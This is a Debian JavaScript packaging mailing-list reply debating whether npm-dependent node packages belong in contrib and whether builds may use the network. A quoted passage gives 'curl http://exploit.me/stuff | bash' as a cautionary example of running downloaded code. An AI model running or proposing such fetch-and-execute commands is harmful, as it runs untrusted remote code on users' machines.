[Pkg-javascript-devel] Bug#877212: Bug#877212: node-d3-color: B-D npm not available in testing
Pirate Praveen
praveen at onenetbeyond.org
Wed Oct 4 11:49:33 UTC 2017
On ചൊവ്വ 03 ഒക്ടോബര് 2017 11:04 വൈകു, Gunnar Wolf wrote:
> I *do* take note, however, of:
>
> Examples of packages which would be included in contrib are:
>
> • free packages which require contrib, non-free packages or packages
> which are not in our archive at all for compilation or execution,
> and
> • wrapper packages or other sorts of free accessories for
> non-free programs.
>
> The first point would seem to cover your use case. However, it's not
> necessarily covering (...) compilation or execution via code just
> downloaded. It does not cover the equivalent of
> "curl http://exploit.me/stuff | bash"
Lets take the two issues separately.
1. Whether they are suitable for contrib
2. Whether network can be used during build.
> I would strongly prefer to ship pre-built binaries as part of your
> environment in debian/.
>
> I guess the ftp-masters approved the packages you mention as they
> *looked* sane, but not because of a deeper inspection of how they were
> built. I see² you have 17 packages in contrib, out of which 14 are
> node-*. Do they all use npm? Would you appreciate if I took a look at
> them and filed bugs accordingly to ask for ftp-masters' opinion?
Like I noted in my previous mail, I already agreed to upload pre-built
binaries and my contention is only on point 1. You may ask ftp-masters
on suitability of them being in contrib even with pre-built binaries.
I have also explained in my previous mails that these are always built
on a maintainer's machine as buildds already prohibit network access
during build. So we are only talking about a change in perception.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: OpenPGP digital signature
URL: <http://lists.alioth.debian.org/pipermail/pkg-javascript-devel/attachments/20171004/6d055acf/attachment-0001.sig>
More information about the Pkg-javascript-devel
mailing list